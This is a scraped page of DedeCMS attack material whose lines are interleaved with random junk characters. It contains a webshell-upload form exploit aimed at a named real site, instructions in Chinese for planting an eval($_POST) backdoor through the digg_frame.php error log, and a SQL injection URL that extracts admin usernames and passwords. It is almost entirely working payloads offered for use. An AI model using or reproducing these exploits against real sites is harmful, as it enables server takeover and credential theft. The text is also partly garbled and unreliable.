' R9 f4 |4 l+ ]" o4 R</head>9 ?, Q/ E2 Y) |7 Y7 S4 S
<body style="FONT-SIZE: 9pt">
0 H% _* U8 w& K5 m---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
' d$ h% T- [$ o8 l: r<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>& Q0 U+ ]- d8 M% Y
<input type='hidden' name='activepath' value='/data/cache/' />
& V+ ^, q$ O- X' c2 [0 P! _<input type='hidden' name='cfg_basedir' value='../../' />
; y7 X) Z( W3 j5 R0 _9 m# x<input type='hidden' name='cfg_imgtype' value='php' />$ ?3 H/ z6 B: ^$ A
<input type='hidden' name='cfg_not_allowall' value='txt' />
! P9 T+ n0 d! A3 W$ P1 [" c<input type='hidden' name='cfg_softtype' value='php' />
5 d' ?0 v! J* r* H+ e" v! J<input type='hidden' name='cfg_mediatype' value='php' />
$ D- Y- N& j* X; J! s<input type='hidden' name='f' value='form1.enclosure' />! W. E6 H2 {4 b% |# f% E, g
<input type='hidden' name='job' value='upload' />, `8 A* E1 k& A: i/ \+ j# f8 {
<input type='hidden' name='newname' value='fly.php' /> i; ]4 g% a% p1 p
Select U Shell <input type='file' name='uploadfile' size='25' />
0 I% W H! c' y! h" D j4 t: Y<input type='submit' name='sb1' value='确定' />1 ^0 Z# ]5 t* H7 q
</form>
# @, h z# s3 H# B# z6 \, }0 ~<br />It's just a exp for the bug of Dedecms V55...<br />
8 ?9 j- c5 W; l# O- \( HNeed register_globals = on...<br />
d% j7 q ]" y9 B: Y- _Fun the game,get a webshell at /data/cache/fly.php...<br />
9 z) w2 _3 `1 [, b" N</body>. w, P! K' f3 }, P
</html>
( u( C |$ }( ]' M8 o% v- C9 {" F7 R+ H0 }: j
i) A6 J! u# T6 _! g
6 `% I3 G, O d$ p* x9 c8 e' u
+ w! s! |7 ~' {6 ]) |
7 {0 I4 T7 A0 }$ _+ `# M# Y- E: e; p- f1 `$ I8 D8 |
" k2 s9 k: {, A( Y; p: v8 c0 X4 |0 [ H, ^
( T2 N9 u6 F# k, {1 ]
% ^/ f) Y0 x& {! |, T织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
4 Y, g) `. g1 p4 F利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
8 x# x# G$ @5 f" Z1. 访问网址:+ q5 F$ w! v2 g7 W
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>$ ]1 G1 t* k0 Z6 {3 G5 ] g) r6 O& P
可看见错误信息: J1 j& H& f' Y4 L) g+ V3 D
* [& l# C. m7 l6 c9 P. L
0 N4 g; [, Q- B& i# L2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。6 b% Z: p% Y; R6 z9 X+ x
int(3) Error: Illegal double '1024e1024' value found during parsing+ C# r5 ^' o" ]& w2 R
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
1 @$ G- a/ @5 m! e' H
, @) `. w r/ G3 h% e8 ~# y, J
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是. U/ t( |# L; a6 P; f7 u2 F
1 Z+ }& ^9 [3 ~+ i& O2 R
: ?( x: Z/ t$ x. h( X; \3 V, M<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
: a9 g2 }& a5 H; G9 q" Y2 P) M/ J6 H% l
0 e0 m$ L8 l, l
按确定后的看到第2步骤的信息表示文件木马上传成功.2 i; P$ n! k3 f3 m8 x
, H* I. F# x* D1 n# C3 o3 q
0 m# o {) t! I/ ]/ ]. [& J+ S
t' F( j6 D+ l* I1 q
7 I* t5 i' d( l8 N7 o8 \5 {5 v- \0 X/ q% H
0 @0 {7 a1 ~0 e
6 J% j* t. \: Z+ Z) ^
# Q1 y! {: B6 a$ c* [) C( P
4 X! y7 v" w0 A4 P) F& j9 n$ F* Q* _1 l4 X( A
& j. y) M, U% N) O9 @! G( E# ^9 Y2 A0 y
织梦(DedeCms)plus/infosearch.php 文件注入漏洞; z1 U7 W- X2 {; c
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|